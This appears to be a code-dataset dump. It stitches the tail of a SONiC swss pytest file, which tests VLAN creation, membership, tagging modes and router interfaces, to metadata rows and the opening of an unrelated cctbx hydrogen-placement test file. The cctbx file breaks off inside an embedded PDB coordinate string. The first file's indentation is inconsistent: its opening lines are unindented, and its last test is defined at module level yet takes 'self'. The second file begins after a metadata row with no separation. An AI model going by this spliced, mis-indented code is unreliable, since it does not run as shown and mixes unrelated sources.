tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN")
vlan_entries = [k for k in tbl.getKeys() if k != dvs.asicdb.default_vlan_id]
assert len(vlan_entries) == 2
tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN_MEMBER")
vlan_member_entries = tbl.getKeys()
assert len(vlan_member_entries) == 3
# create vlan members
dvs.create_vlan_member("18", "Ethernet40")
dvs.create_vlan_member("18", "Ethernet44")
dvs.create_vlan_member("18", "Ethernet48")
tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN_MEMBER")
vlan_member_entries = tbl.getKeys()
assert len(vlan_member_entries) == 6
# remove vlan members
dvs.remove_vlan_member("18", "Ethernet40")
dvs.remove_vlan_member("18", "Ethernet44")
dvs.remove_vlan_member("18", "Ethernet48")
tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN_MEMBER")
vlan_member_entries = tbl.getKeys()
assert len(vlan_member_entries) == 3
# remove vlan members
dvs.remove_vlan_member("188", "Ethernet20")
dvs.remove_vlan_member("188", "Ethernet24")
dvs.remove_vlan_member("188", "Ethernet28")
tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN_MEMBER")
vlan_member_entries = tbl.getKeys()
assert len(vlan_member_entries) == 0
# member ports should have been detached from bridge master properly
exitcode, output = dvs.runcmd(['sh', '-c', "ip link show Ethernet20 | grep -w master"])
assert exitcode != 0
exitcode, output = dvs.runcmd(['sh', '-c', "ip link show Ethernet24 | grep -w master"])
assert exitcode != 0
exitcode, output = dvs.runcmd(['sh', '-c', "ip link show Ethernet28 | grep -w master"])
assert exitcode != 0
# remove vlans
dvs.remove_vlan("18")
dvs.remove_vlan("188")
# check asic database
tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN")
vlan_entries = [k for k in tbl.getKeys() if k != dvs.asicdb.default_vlan_id]
assert len(vlan_entries) == 0
    def test_VlanIncrementalConfig(self, dvs, testlog):
        """Incrementally reconfigure a live VLAN interface: create VLAN + member,
        assign an IP (router interface appears with default MTU 9100), change the
        MTU, flip admin status down/up, then tear everything down.
        """
        dvs.setup_db()
        # create vlan
        dvs.create_vlan("2")
        # check asic database
        tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN")
        vlan_entries = [k for k in tbl.getKeys() if k != dvs.asicdb.default_vlan_id]
        assert len(vlan_entries) == 1
        vlan_oid = vlan_entries[0]
        (status, fvs) = tbl.get(vlan_oid)
        assert status == True
        for fv in fvs:
            if fv[0] == "SAI_VLAN_ATTR_VLAN_ID":
                assert fv[1] == "2"
        # create vlan member
        dvs.create_vlan_member("2", "Ethernet0")
        # check asic database
        # map bridge-port OID -> underlying port OID so member entries can be resolved
        bridge_port_map = {}
        tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_BRIDGE_PORT")
        bridge_port_entries = tbl.getKeys()
        for key in bridge_port_entries:
            (status, fvs) = tbl.get(key)
            assert status == True
            for fv in fvs:
                if fv[0] == "SAI_BRIDGE_PORT_ATTR_PORT_ID":
                    bridge_port_map[key] = fv[1]
        tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN_MEMBER")
        vlan_member_entries = tbl.getKeys()
        assert len(vlan_member_entries) == 1
        (status, fvs) = tbl.get(vlan_member_entries[0])
        assert status == True
        assert len(fvs) == 3
        for fv in fvs:
            if fv[0] == "SAI_VLAN_MEMBER_ATTR_VLAN_TAGGING_MODE":
                assert fv[1] == "SAI_VLAN_TAGGING_MODE_UNTAGGED"
            elif fv[0] == "SAI_VLAN_MEMBER_ATTR_VLAN_ID":
                assert fv[1] == vlan_oid
            elif fv[0] == "SAI_VLAN_MEMBER_ATTR_BRIDGE_PORT_ID":
                assert dvs.asicdb.portoidmap[bridge_port_map[fv[1]]] == "Ethernet0"
            else:
                assert False
        # assign IP to interface
        dvs.add_ip_address("Vlan2", "20.0.0.8/29")
        # check ASIC router interface database for mtu changes.
        tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_ROUTER_INTERFACE")
        intf_entries = tbl.getKeys()
        # one loopback router interface one vlan based router interface
        assert len(intf_entries) == 2
        for key in intf_entries:
            (status, fvs) = tbl.get(key)
            assert status == True
            # a Vlan based router interface has five field/value tuples
            if len(fvs) == 5:
                for fv in fvs:
                    if fv[0] == "SAI_ROUTER_INTERFACE_ATTR_TYPE":
                        assert fv[1] == "SAI_ROUTER_INTERFACE_TYPE_VLAN"
                    # assert the default value 9100 for the router interface
                    if fv[0] == "SAI_ROUTER_INTERFACE_ATTR_MTU":
                        assert fv[1] == "9100"
        # configure MTU to interface
        dvs.set_mtu("Vlan2", "8888")
        intf_entries = tbl.getKeys()
        for key in intf_entries:
            (status, fvs) = tbl.get(key)
            assert status == True
            # a Vlan based router interface has five field/value tuples
            if len(fvs) == 5:
                for fv in fvs:
                    if fv[0] == "SAI_ROUTER_INTERFACE_ATTR_TYPE":
                        assert fv[1] == "SAI_ROUTER_INTERFACE_TYPE_VLAN"
                    # assert the new value set to the router interface
                    if fv[0] == "SAI_ROUTER_INTERFACE_ATTR_MTU":
                        assert fv[1] == "8888"
        # check appDB for VLAN admin_status change.
        tbl = swsscommon.Table(dvs.pdb, "VLAN_TABLE")
        dvs.set_interface_status("Vlan2", "down")
        (status, fvs) = tbl.get("Vlan2")
        assert status == True
        for fv in fvs:
            if fv[0] == "admin_status":
                assert fv[1] == "down"
        dvs.set_interface_status("Vlan2", "up")
        (status, fvs) = tbl.get("Vlan2")
        assert status == True
        for fv in fvs:
            if fv[0] == "admin_status":
                assert fv[1] == "up"
        # remove IP from interface
        dvs.remove_ip_address("Vlan2", "20.0.0.8/29")
        # remove vlan member
        dvs.remove_vlan_member("2", "Ethernet0")
        # remove vlan
        dvs.remove_vlan("2")
    # NOTE(review): platform.linux_distribution() was removed in Python 3.8 -- confirm runtime.
    @pytest.mark.skipif(StrictVersion(platform.linux_distribution()[1]) <= StrictVersion('8.9'), reason="Debian 8.9 or before has no support")
    @pytest.mark.parametrize("test_input, expected", [
        (["Vla", "2"], 0),
        (["VLAN", "3"], 0),
        (["vlan", "4"], 0),
        (["Vlan", "5"], 1),
    ])
    def test_AddVlanWithIncorrectKeyPrefix(self, dvs, testlog, test_input, expected):
        """Write VLAN config keys with wrong/right 'Vlan' prefixes and verify that
        only the correctly prefixed key produces an ASIC_DB VLAN; otherwise a
        vlanmgrd error must be logged.
        """
        dvs.setup_db()
        marker = dvs.add_log_marker()
        vlan_prefix = test_input[0]
        vlan = test_input[1]
        # create vlan
        tbl = swsscommon.Table(dvs.cdb, "VLAN")
        fvs = swsscommon.FieldValuePairs([("vlanid", vlan)])
        tbl.set(vlan_prefix + vlan, fvs)
        time.sleep(1)
        # check asic database
        tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN")
        vlan_entries = [k for k in tbl.getKeys() if k != dvs.asicdb.default_vlan_id]
        assert len(vlan_entries) == expected
        if len(vlan_entries) == 0:
            # check error log
            self.check_syslog(dvs, marker, "vlanmgrd", "Invalid key format. No 'Vlan' prefix:", vlan_prefix+vlan, 1)
        else:
            #remove vlan
            dvs.remove_vlan(vlan)
    # NOTE(review): platform.linux_distribution() was removed in Python 3.8 -- confirm runtime.
    @pytest.mark.skipif(StrictVersion(platform.linux_distribution()[1]) <= StrictVersion('8.9'), reason="Debian 8.9 or before has no support")
    @pytest.mark.parametrize("test_input, expected", [
        (["Vlan", "abc"], 0),
        (["Vlan", "a3"], 0),
        (["Vlan", ""], 0),
        (["Vlan", "5"], 1),
    ])
    def test_AddVlanWithIncorrectValueType(self, dvs, testlog, test_input, expected):
        """Write VLAN config keys whose id part is non-numeric/empty and verify
        they are rejected (no ASIC_DB VLAN, vlanmgrd error logged); a numeric id
        must succeed.
        """
        dvs.setup_db()
        marker = dvs.add_log_marker()
        vlan_prefix = test_input[0]
        vlan = test_input[1]
        # create vlan
        tbl = swsscommon.Table(dvs.cdb, "VLAN")
        fvs = swsscommon.FieldValuePairs([("vlanid", vlan)])
        tbl.set(vlan_prefix + vlan, fvs)
        time.sleep(1)
        # check asic database
        tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN")
        vlan_entries = [k for k in tbl.getKeys() if k != dvs.asicdb.default_vlan_id]
        assert len(vlan_entries) == expected
        if len(vlan_entries) == 0:
            # check error log
            self.check_syslog(dvs, marker, "vlanmgrd", "Invalid key format. Not a number after \'Vlan\' prefix:", vlan_prefix+vlan, 1)
        else:
            #remove vlan
            dvs.remove_vlan(vlan)
    def test_AddPortChannelToVlan(self, dvs, testlog):
        """Create a port channel with one member, add it to a VLAN as a tagged
        member, then remove everything in reverse order, checking ASIC_DB
        LAG / LAG member / VLAN / VLAN member counts at each step.
        """
        self.setup_db(dvs)
        marker = dvs.add_log_marker()
        vlan = "2"
        channel = "001"
        # create port channel
        self.create_port_channel(dvs, channel)
        # check asic database
        tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_LAG")
        lag_entries = tbl.getKeys()
        assert len(lag_entries) == 1
        # add port channel member
        self.create_port_channel_member(channel, "Ethernet0")
        # check asic database
        tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_LAG_MEMBER")
        lag_member_entries = tbl.getKeys()
        assert len(lag_member_entries) == 1
        (status, fvs) = tbl.get(lag_member_entries[0])
        for fv in fvs:
            if fv[0] == "SAI_LAG_MEMBER_ATTR_LAG_ID":
                assert fv[1] == lag_entries[0]
            elif fv[0] == "SAI_LAG_MEMBER_ATTR_PORT_ID":
                assert dvs.asicdb.portoidmap[fv[1]] == "Ethernet0"
            else:
                assert False
        # create vlan
        self.create_vlan(vlan)
        # check asic database
        tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN")
        vlan_entries = [k for k in tbl.getKeys() if k != dvs.asicdb.default_vlan_id]
        assert len(vlan_entries) == 1
        # create vlan member
        self.create_vlan_member(vlan, "PortChannel" + channel, "tagged")
        # check asic database
        tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN_MEMBER")
        vlan_member_entries = tbl.getKeys()
        assert len(vlan_member_entries) == 1
        # remove vlan member
        self.remove_vlan_member(vlan, "PortChannel" + channel)
        # check asic database
        tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN_MEMBER")
        vlan_member_entries = tbl.getKeys()
        assert len(vlan_member_entries) == 0
        # remove vlan
        self.remove_vlan(vlan)
        # check asic database
        tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN")
        vlan_entries = [k for k in tbl.getKeys() if k != dvs.asicdb.default_vlan_id]
        assert len(vlan_entries) == 0
        # remove trunk member
        self.remove_port_channel_member(channel, "Ethernet0")
        # check asic database
        tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_LAG_MEMBER")
        lag_member_entries = tbl.getKeys()
        assert len(lag_member_entries) == 0
        # remove trunk
        self.remove_port_channel(dvs, channel)
        # check asic database
        tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_LAG")
        lag_entries = tbl.getKeys()
        assert len(lag_entries) == 0
    def test_AddVlanMemberWithNonExistVlan(self, dvs, testlog):
        """Adding a member to a VLAN that was never created must produce neither
        a VLAN nor a VLAN member entry in ASIC_DB.
        """
        dvs.setup_db()
        marker = dvs.add_log_marker()
        vlan = "2"
        # create vlan member
        dvs.create_vlan_member(vlan, "Ethernet0")
        # check asic database
        tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN")
        vlan_entries = [k for k in tbl.getKeys() if k != dvs.asicdb.default_vlan_id]
        assert len(vlan_entries) == 0
        tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN_MEMBER")
        vlan_member_entries = tbl.getKeys()
        assert len(vlan_member_entries) == 0
        # remove vlan member from cfgdb
        dvs.remove_vlan_member(vlan, "Ethernet0")
    def test_RemoveNonexistentVlan(self, dvs, testlog):
        """Removing a VLAN that does not exist must be harmless: afterwards the
        same VLAN id can still be created and removed normally.
        """
        dvs.setup_db()
        marker = dvs.add_log_marker()
        vlan = "2"
        # check asic database
        tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN")
        vlan_entries = [k for k in tbl.getKeys() if k != dvs.asicdb.default_vlan_id]
        assert len(vlan_entries) == 0
        # remove nonexistent vlan
        dvs.remove_vlan(vlan)
        # create vlan
        dvs.create_vlan(vlan)
        # check asic database
        tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN")
        vlan_entries = [k for k in tbl.getKeys() if k != dvs.asicdb.default_vlan_id]
        assert len(vlan_entries) == 1
        # remove vlan
        dvs.remove_vlan(vlan)
    # NOTE(review): platform.linux_distribution() was removed in Python 3.8 -- confirm runtime.
    @pytest.mark.skipif(StrictVersion(platform.linux_distribution()[1]) <= StrictVersion('8.9'), reason="Debian 8.9 or before has no support")
    @pytest.mark.parametrize("test_input, expected", [
        (["tagging_mode", "untagged"], [1, "SAI_VLAN_TAGGING_MODE_UNTAGGED"]),
        (["tagging_mode", "tagged"], [1, "SAI_VLAN_TAGGING_MODE_TAGGED"]),
        (["tagging_mode", "priority_tagged"], [1, "SAI_VLAN_TAGGING_MODE_PRIORITY_TAGGED"]),
        (["tagging_mode", "unexpected_mode"], [0, ""]),
        (["no_tag_mode", ""], [1, "SAI_VLAN_TAGGING_MODE_UNTAGGED"]),
    ])
    def test_VlanMemberTaggingMode(self, dvs, testlog, test_input, expected):
        """For each (field, tagging-mode) pair, add a VLAN member and verify the
        expected ASIC_DB tagging mode (default untagged when the field is
        absent); an invalid mode must yield no member and a vlanmgrd error.
        """
        self.setup_db(dvs)
        tagging_mode_prefix = test_input[0]
        tagging_mode = test_input[1]
        marker = dvs.add_log_marker()
        vlan = "2"
        # create vlan
        self.create_vlan(vlan)
        # check asic database
        tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN")
        vlan_entries = [k for k in tbl.getKeys() if k != dvs.asicdb.default_vlan_id]
        assert len(vlan_entries) == 1
        vlan_oid = vlan_entries[0]
        # add vlan member
        tbl = swsscommon.Table(self.cdb, "VLAN_MEMBER")
        fvs = swsscommon.FieldValuePairs([(tagging_mode_prefix, tagging_mode)])
        tbl.set("Vlan" + vlan + "|" + "Ethernet0", fvs)
        time.sleep(1)
        # check asic database
        # map bridge-port OID -> underlying port OID so member entries can be resolved
        bridge_port_map = {}
        tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_BRIDGE_PORT")
        bridge_port_entries = tbl.getKeys()
        for key in bridge_port_entries:
            (status, fvs) = tbl.get(key)
            assert status == True
            for fv in fvs:
                if fv[0] == "SAI_BRIDGE_PORT_ATTR_PORT_ID":
                    bridge_port_map[key] = fv[1]
        tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN_MEMBER")
        vlan_member_entries = tbl.getKeys()
        assert len(vlan_member_entries) == expected[0]
        if len(vlan_member_entries) == 1:
            (status, fvs) = tbl.get(vlan_member_entries[0])
            assert status == True
            assert len(fvs) == 3
            for fv in fvs:
                if fv[0] == "SAI_VLAN_MEMBER_ATTR_VLAN_TAGGING_MODE":
                    assert fv[1] == expected[1]
                elif fv[0] == "SAI_VLAN_MEMBER_ATTR_VLAN_ID":
                    assert fv[1] == vlan_oid
                elif fv[0] == "SAI_VLAN_MEMBER_ATTR_BRIDGE_PORT_ID":
                    assert dvs.asicdb.portoidmap[bridge_port_map[fv[1]]] == "Ethernet0"
                else:
                    assert False
        else:
            # check error log
            self.check_syslog(dvs, marker, "vlanmgrd", "Wrong tagging_mode", test_input, 1)
        # remove vlan member
        self.remove_vlan_member(vlan, "Ethernet0")
        # remove vlan
        self.remove_vlan(vlan)
    @pytest.mark.skip(reason="AddMaxVlan take too long to execute")
    def test_AddMaxVlan(self, dvs, testlog):
        """Create the full valid VLAN range (2..4094), verify 4093 ASIC_DB
        entries, then remove them all. Skipped by default: far too slow.
        """
        dvs.setup_db()
        min_vid = 2
        max_vid = 4094
        # create max vlan
        vlan = min_vid
        while vlan <= max_vid:
            dvs.create_vlan(str(vlan))
            vlan += 1
        # check asic database
        tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN")
        vlan_entries = [k for k in tbl.getKeys() if k != dvs.asicdb.default_vlan_id]
        assert len(vlan_entries) == (4094-1)
        # remove all vlan
        vlan = min_vid
        while vlan <= max_vid:
            dvs.remove_vlan(str(vlan))
            vlan += 1
        # check asic database
        tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN")
        vlan_entries = [k for k in tbl.getKeys() if k != dvs.asicdb.default_vlan_id]
        assert len(vlan_entries) == 0
    def test_RemoveVlanWithRouterInterface(self, dvs, testlog):
        """A VLAN that still carries a router interface (assigned IP) must
        survive a removal attempt; once the IP is removed, removing the VLAN
        must succeed.
        """
        dvs.setup_db()
        marker = dvs.add_log_marker()
        # create vlan
        dvs.create_vlan("100")
        # check asic database
        tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN")
        vlan_entries = [k for k in tbl.getKeys() if k != dvs.asicdb.default_vlan_id]
        assert len(vlan_entries) == 1
        vlan_oid = vlan_entries[0]
        (status, fvs) = tbl.get(vlan_oid)
        assert status == True
        for fv in fvs:
            if fv[0] == "SAI_VLAN_ATTR_VLAN_ID":
                assert fv[1] == "100"
        # assign IP to interface
        dvs.add_ip_address("Vlan100", "20.0.0.8/29")
        # check ASIC router interface database for mtu changes.
        tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_ROUTER_INTERFACE")
        intf_entries = tbl.getKeys()
        # one loopback router interface one vlan based router interface
        assert len(intf_entries) == 2
        # remove vlan
        dvs.remove_vlan("100")
        # check asic database still contains the vlan
        tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN")
        vlan_entries = [k for k in tbl.getKeys() if k != dvs.asicdb.default_vlan_id]
        assert len(vlan_entries) == 1
        vlan_oid = vlan_entries[0]
        (status, fvs) = tbl.get(vlan_oid)
        assert status == True
        for fv in fvs:
            if fv[0] == "SAI_VLAN_ATTR_VLAN_ID":
                assert fv[1] == "100"
        # remove IP from interface
        dvs.remove_ip_address("Vlan100", "20.0.0.8/29")
        # remove vlan
        dvs.remove_vlan("100")
        # check asic database does not contain the vlan anymore
        tbl = swsscommon.Table(dvs.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN")
        vlan_entries = [k for k in tbl.getKeys() if k != dvs.asicdb.default_vlan_id]
        assert len(vlan_entries) == 0
    def test_VlanDbData(self, dvs, testlog):
        """Create a VLAN and verify its representation in all three databases:
        APP_DB fields (admin_status/mtu), STATE_DB state and the ASIC_DB
        SAI_VLAN_ATTR_VLAN_ID.
        """
        self.setup_db(dvs)
        vlan = "2"
        # create vlan
        self.create_vlan(vlan)
        # check app database
        tbl = swsscommon.Table(self.pdb, "VLAN_TABLE")
        vlan_entries = tbl.getKeys()
        assert len(vlan_entries) == 1
        vlan_oid = vlan_entries[0]
        (status, fvs) = tbl.get(vlan_oid)
        self.check_app_db_vlan_fields(fvs)
        # check state database
        tbl = swsscommon.Table(self.sdb, "VLAN_TABLE")
        vlan_entries = tbl.getKeys()
        assert len(vlan_entries) == 1
        vlan_oid = vlan_entries[0]
        (status, fvs) = tbl.get(vlan_oid)
        self.check_state_db_vlan_fields(fvs)
        # check asic database
        tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN")
        vlan_entries = [k for k in tbl.getKeys() if k != dvs.asicdb.default_vlan_id]
        assert len(vlan_entries) == 1
        vlan_oid = vlan_entries[0]
        (status, fvs) = tbl.get(vlan_oid)
        assert status == True
        for fv in fvs:
            if fv[0] == "SAI_VLAN_ATTR_VLAN_ID":
                assert fv[1] == vlan
        # remove vlan
        self.remove_vlan(vlan)
# NOTE(review): `platform.linux_distribution()` was removed in Python 3.8 and
# `distutils.version.StrictVersion` is deprecated — this skipif will raise an
# AttributeError on modern interpreters; presumably the test environment pins
# an older Python. TODO confirm and migrate (e.g. to the `distro` package).
@pytest.mark.skipif(StrictVersion(platform.linux_distribution()[1]) <= StrictVersion('8.9'), reason="Debian 8.9 or before has no support")
@pytest.mark.parametrize("test_input, expected", [
    (["untagged"], ["SAI_VLAN_TAGGING_MODE_UNTAGGED"]),
    (["tagged"], ["SAI_VLAN_TAGGING_MODE_TAGGED"]),
    (["priority_tagged"], ["SAI_VLAN_TAGGING_MODE_PRIORITY_TAGGED"]),
])
def test_VlanMemberDbData(self, dvs, testlog, test_input, expected):
    """Create a VLAN member in each tagging mode and verify the entry in the
    APP, STATE and ASIC databases, including the SAI tagging-mode attribute."""
    self.setup_db(dvs)

    vlan = "2"
    interface = "Ethernet0"
    tagging_mode = test_input[0]

    # create vlan
    self.create_vlan(vlan)

    # check asic database: capture the OID of the newly created VLAN so the
    # member's SAI_VLAN_MEMBER_ATTR_VLAN_ID can be checked against it below
    tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN")
    vlan_entries = [k for k in tbl.getKeys() if k != dvs.asicdb.default_vlan_id]
    assert len(vlan_entries) == 1
    vlan_oid = vlan_entries[0]

    # create vlan member
    self.create_vlan_member(vlan, interface, tagging_mode)

    # check app database: one member entry with the requested tagging mode
    tbl = swsscommon.Table(self.pdb, "VLAN_MEMBER_TABLE")
    vlan_member_entries = tbl.getKeys()
    assert len(vlan_member_entries) == 1
    vlan_member_oid = vlan_member_entries[0]
    (status, fvs) = tbl.get(vlan_member_oid)
    self.check_app_db_vlan_member_fields(fvs, tagging_mode)

    # check state database
    tbl = swsscommon.Table(self.sdb, "VLAN_MEMBER_TABLE")
    vlan_member_entries = tbl.getKeys()
    assert len(vlan_member_entries) == 1
    vlan_member_oid = vlan_member_entries[0]
    (status, fvs) = tbl.get(vlan_member_oid)
    self.check_state_db_vlan_member_fields(fvs)

    # check asic database: first build a map from bridge-port OID to the
    # underlying port OID so the member's bridge port can be resolved back
    # to a front-panel interface name
    bridge_port_map = {}
    tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_BRIDGE_PORT")
    bridge_port_entries = tbl.getKeys()
    for key in bridge_port_entries:
        (status, fvs) = tbl.get(key)
        assert status == True
        for fv in fvs:
            if fv[0] == "SAI_BRIDGE_PORT_ATTR_PORT_ID":
                bridge_port_map[key] = fv[1]

    # the single VLAN member object must carry exactly three attributes:
    # tagging mode, VLAN OID, and a bridge port resolving to `interface`
    tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_VLAN_MEMBER")
    vlan_member_entries = tbl.getKeys()
    assert len(vlan_member_entries) == 1
    (status, fvs) = tbl.get(vlan_member_entries[0])
    assert status == True
    assert len(fvs) == 3
    for fv in fvs:
        if fv[0] == "SAI_VLAN_MEMBER_ATTR_VLAN_TAGGING_MODE":
            assert fv[1] == expected[0]
        elif fv[0] == "SAI_VLAN_MEMBER_ATTR_VLAN_ID":
            assert fv[1] == vlan_oid
        elif fv[0] == "SAI_VLAN_MEMBER_ATTR_BRIDGE_PORT_ID":
            assert dvs.asicdb.portoidmap[bridge_port_map[fv[1]]] == interface
        else:
            # any other attribute is unexpected
            assert False

    # remove vlan member
    self.remove_vlan_member(vlan, interface)
    # remove vlan
    self.remove_vlan(vlan)
| 37.984049
| 187
| 0.604096
|
4a02050f65843d9f8b08dd0dab52ae3b370d4ef9
| 37,764
|
py
|
Python
|
mmtbx/hydrogens/tst_add_hydrogen_2.py
|
dperl-sol/cctbx_project
|
b9e390221a2bc4fd00b9122e97c3b79c632c6664
|
[
"BSD-3-Clause-LBNL"
] | 155
|
2016-11-23T12:52:16.000Z
|
2022-03-31T15:35:44.000Z
|
mmtbx/hydrogens/tst_add_hydrogen_2.py
|
dperl-sol/cctbx_project
|
b9e390221a2bc4fd00b9122e97c3b79c632c6664
|
[
"BSD-3-Clause-LBNL"
] | 590
|
2016-12-10T11:31:18.000Z
|
2022-03-30T23:10:09.000Z
|
mmtbx/hydrogens/tst_add_hydrogen_2.py
|
dperl-sol/cctbx_project
|
b9e390221a2bc4fd00b9122e97c3b79c632c6664
|
[
"BSD-3-Clause-LBNL"
] | 115
|
2016-11-15T08:17:28.000Z
|
2022-02-09T15:30:14.000Z
|
from __future__ import absolute_import, division, print_function
import time
import mmtbx.model
import iotbx.pdb
from mmtbx.hydrogens import reduce_hydrogen
from libtbx.utils import null_out
from libtbx.test_utils import approx_equal
# ------------------------------------------------------------------------------
def run():
  """Execute every test case in this module, in definition order."""
  for test_case in (test_000, test_001, test_002, test_003, test_004,
                    test_005, test_006, test_007, test_008, test_009):
    test_case()
# ------------------------------------------------------------------------------
def compare_models(pdb_str,
                   contains = None,
                   not_contains = None):
  """
  Round-trip check for hydrogen placement: read a model that already has
  H atoms, strip them, re-place them with reduce_hydrogen, then verify
  that hierarchy, H-atom count, H-atom names and coordinates (to within
  0.01 A) all agree with the input model.
  """
  pdb_inp = iotbx.pdb.input(lines=pdb_str.split("\n"), source_info=None)
  # reference model, as supplied (contains the expected H atoms)
  model_ref = mmtbx.model.manager(model_input = pdb_inp,
                                  log         = null_out())
  h_sel_ref = model_ref.get_hd_selection()
  n_h_expected = h_sel_ref.count(True)
  ph_ref = model_ref.get_hierarchy()
  names_ref = list(ph_ref.select(h_sel_ref).atoms().extract_name())

  # strip all H/D atoms and make sure none survive
  model_noH = model_ref.select(~h_sel_ref)
  sel_noH = model_noH.get_hd_selection()
  assert (sel_noH is not None)
  assert (sel_noH.count(True) == 0)

  # re-place the H atoms
  add_h = reduce_hydrogen.place_hydrogens(model = model_noH)
  add_h.run()
  model_new = add_h.get_model()
  h_sel_new = model_new.get_hd_selection()
  ph_new = model_new.get_hierarchy()
  names_new = list(ph_new.select(h_sel_new).atoms().extract_name())

  # same hierarchy and same number of H atoms as the input
  assert ph_ref.is_similar_hierarchy(other=ph_new)
  assert(n_h_expected == h_sel_new.count(True))
  if not_contains:
    assert (not_contains not in names_new)
  if contains:
    assert (contains in names_new)

  # per-name coordinate comparison; dict() keeps the last occurrence of a
  # duplicated name (e.g. altloc conformers), matching on that one
  xyz_ref = model_ref.select(h_sel_ref).get_sites_cart()
  xyz_new = model_new.select(h_sel_new).get_sites_cart()
  ref_map = dict(zip(names_ref, xyz_ref))
  new_map = dict(zip(names_new, xyz_new))
  for name, xyz in new_map.items():
    assert(name in ref_map)
    assert approx_equal(xyz, ref_map[name], 0.01), name
# ------------------------------------------------------------------------------
def test_000():
  """CDL is on by default; this snippet would crash if it were off."""
  compare_models(pdb_str_000)

# ------------------------------------------------------------------------------

def test_001():
  """
  Clash between LYS 246 NZ and TAM 2 C5 makes REDUCE fail on this input.
  Removing Lys 246 NZ, TAM 2 C5, or both Lys 246 HZ1 and HZ3 lets Reduce
  finish with a usable result, but it will not re-add Lys 246 HZ1/HZ3.
  """
  compare_models(pdb_str_001)

# ------------------------------------------------------------------------------

def test_002():
  """Multi-model (MODEL/ENDMDL) files are supported."""
  compare_models(pdb_str_002)

# ------------------------------------------------------------------------------

def test_003():
  """Both a normal and a modified nucleic acid are handled."""
  compare_models(pdb_str_003)

# ------------------------------------------------------------------------------

def test_004():
  """Double conformation: TYR with every atom in either altloc A or B."""
  compare_models(pdb_str_004)

# ------------------------------------------------------------------------------

def test_005():
  """Double conformation: GLU with atoms in altloc A, B or '' (blank)."""
  compare_models(pdb_str_005)

# ------------------------------------------------------------------------------

def test_006():
  """A model with no H atoms to place (ions, waters) is handled cleanly."""
  compare_models(pdb_str_006)

# ------------------------------------------------------------------------------

def test_007():
  """mmCIF input works as well as PDB."""
  compare_models(pdb_str_007)

# ------------------------------------------------------------------------------

def test_008():
  """CYS-CYS disulfide bond with a double conformation."""
  compare_models(pdb_str_008)

# ------------------------------------------------------------------------------
def test_009():
  """
  1KYC: SIN linked to GLU1, but later in file. Goal: no NH3 to GLU.
  """
  compare_models(pdb_str = pdb_str_009)
  # Fix: a stray debug-only `assert 0` used to follow this call, making the
  # test (and therefore the whole run() suite) fail unconditionally even
  # when compare_models succeeded.  It has been removed.
# ------------------------------------------------------------------------------
pdb_str_000 = """
REMARK This will crash if CDL is set to FALSE
CRYST1 72.240 72.010 86.990 90.00 90.00 90.00 P 21 21 21
ATOM 1 N PRO H 1 52.628 -74.147 33.427 1.00 20.43 N
ATOM 2 CA PRO H 1 53.440 -73.630 34.533 1.00 20.01 C
ATOM 3 C PRO H 1 54.482 -72.584 34.124 1.00 20.76 C
ATOM 4 O PRO H 1 55.025 -72.627 33.021 1.00 16.34 O
ATOM 5 CB PRO H 1 54.055 -74.895 35.134 1.00 22.06 C
ATOM 6 CG PRO H 1 54.084 -75.862 33.972 1.00 25.16 C
ATOM 7 CD PRO H 1 52.770 -75.608 33.294 1.00 17.36 C
ATOM 8 H2 PRO H 1 51.760 -73.969 33.583 1.00 20.43 H
ATOM 9 H3 PRO H 1 52.881 -73.753 32.659 1.00 20.43 H
